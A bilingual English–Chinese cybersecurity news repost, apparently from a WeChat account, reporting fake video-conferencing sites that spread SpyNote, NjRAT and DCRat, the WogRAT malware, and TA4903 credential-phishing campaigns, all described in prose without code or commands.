小心：伪装的Zoom、Skype、Google Meet网站可能传播恶意软件

Threat actors have been leveraging fake websites advertising popular video conferencing software such as Google Meet, Skype, and Zoom to deliver a variety of malware targeting both Android and Windows users since December 2023.

威胁行为者自2023年12月以来一直利用伪造的网站来宣传流行的视频会议软件，如Google Meet、Skype和Zoom，以传送针对Android和Windows用户的各种恶意软件。

"The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems," Zscaler ThreatLabz researchers said.

"威胁行为者正在分发远程访问木马（RAT），包括用于Android平台的SpyNote RAT，以及用于Windows系统的NjRAT和DCRat，" Zscaler ThreatLabz的研究人员说。

The spoofed sites are in Russian and are hosted on domains that closely resemble their legitimate counterparts, indicating that the attackers are using typosquatting tricks to lure prospective victims into downloading the malware.

这些伪造的网站是用俄语编写的，并托管在与其合法对应物密切相关的域上，这表明攻击者正在使用错字托管技巧来诱使潜在受害者下载恶意软件。

They also come with options to download the app for Android, iOS, and Windows platforms. While clicking on the button for Android downloads an APK file, clicking on the Windows app button triggers the download of a batch script.

它们还带有下载Android、iOS和Windows平台应用的选项。点击Android按钮会下载一个APK文件，点击Windows应用按钮会触发批处理脚本的下载。

The malicious batch script is responsible for executing a PowerShell script, which, in turn, downloads and executes the remote access trojan.

恶意批处理脚本负责执行PowerShell脚本，进而下载并执行远程访问木马。

Currently, there is no evidence that the threat actor is targeting iOS users, given that clicking on the button for the iOS app takes the user to the legitimate Apple App Store listing for Skype.

目前没有证据表明威胁行为者正在针对iOS用户，因为点击iOS应用按钮会将用户带到Skype在合法Apple App Store上的列表。

"A threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files," the researchers said.

"威胁行为者正在利用这些诱饵来分发针对Android和Windows的RAT，这些RAT可以窃取机密信息，记录按键，窃取文件，" 研究人员说。

The development comes as the AhnLab Security Intelligence Center (ASEC) revealed that a new malware dubbed WogRAT targeting both Windows and Linux is abusing a free online notepad platform called aNotepad as a covert vector for hosting and retrieving malicious code.

这一发展发生在安全情报中心（ASEC）揭示一种名为WogRAT的新恶意软件正在针对Windows和Linux，它利用名为aNotepad的免费在线记事本平台作为托管和检索恶意代码的隐秘载体。

It's said to be active from at least late 2022, targeting Asian countries like China, Hong Kong, Japan, and Singapore, among others. That said, it's currently not known how the malware is distributed in the wild.

据说至少自2022年末以来活跃，目标亚洲国家如中国、香港、日本和新加坡等。尽管如此，目前尚不清楚该恶意软件如何在野外传播。

"When WogRAT is run for the first time, it collects basic information of the infected system and sends them to the C&C server," ASEC said. "The malware then supports commands such as executing commands, sending results, downloading files, and uploading these files."

"当WogRAT首次运行时，它会收集受感染系统的基本信息并将其发送到C&C服务器，" ASEC说。"然后恶意软件支持执行命令、发送结果、下载文件以及上传这些文件等命令。"

It also coincides with high-volume phishing campaigns orchestrated by a financially motivated cybercriminal actor known as TA4903 to steal corporate credentials and likely follow them with business email compromise (BEC) attacks. The adversary has been active since at least 2019, with the activities intensifying post mid-2023.

这也与一个名为TA4903的金融动机的网络犯罪行为者进行的大规模网络钓鱼活动相吻合，该行为者旨在窃取公司凭证并很可能跟随商业电子邮件欺诈（BEC）攻击。

"TA4903 routinely conducts campaigns spoofing various U.S. government entities to steal corporate credentials," Proofpoint said. "The actor also spoofs organizations in various sectors including construction, finance, healthcare, food and beverage, and others."

"TA4903定期进行伪装各种美国政府实体的活动，以窃取公司凭证，" Proofpoint说。"该行为者还伪装各个部门的组织，包括建筑、金融、医疗保健、食品和饮料等。"

Attack chains involve the use of QR codes (aka quishing) for credential phishing as well as relying on the EvilProxy adversary-in-the-middle (AiTM) phishing kit to bypass two-factor authentication (2FA) protections.

攻击链包括使用QR码（又称quishing）进行凭证网络钓鱼，以及依赖EvilProxy中间人（AiTM）网络钓鱼工具包来绕过双因素身份验证（2FA）保护。

Once a target mailbox is compromised, the threat actor has been observed searching for information relevant to payments, invoices, and bank information, with the ultimate goal of hijacking existing email threads and performing invoice fraud.

一旦目标邮箱被攻破，威胁行为者已经被观察到正在搜索与付款、发票和银行信息相关的信息，最终目标是劫持现有电子邮件线程并执行发票欺诈。

Phishing campaigns have also functioned as a conduit for other malware families like DarkGate, Agent Tesla, and Remcos RAT, the last of which leverages steganographic decoys to drop the malware on compromised hosts.

网络钓鱼活动还作为其他恶意软件系列的传播管道，如DarkGate、Agent Tesla和Remcos RAT，后者利用隐写伪装品在受感染主机上放置恶意软件。

参考资料

[1]https://thehackernews.com/2024/03/watch-out-for-spoofed-zoom-skype-google.html

关注我们

        欢迎来到我们的公众号！我们专注于全球网络安全和精选双语资讯，为您带来最新的资讯和深入的分析。在这里，您可以了解世界各地的网络安全事件，同时通过我们的双语新闻，获取更多的行业知识。感谢您选择关注我们，我们将继续努力，为您带来有价值的内容。

原文始发于微信公众号（知机安全）：小心：伪装的Zoom、Skype、Google Meet网站可能传播恶意软件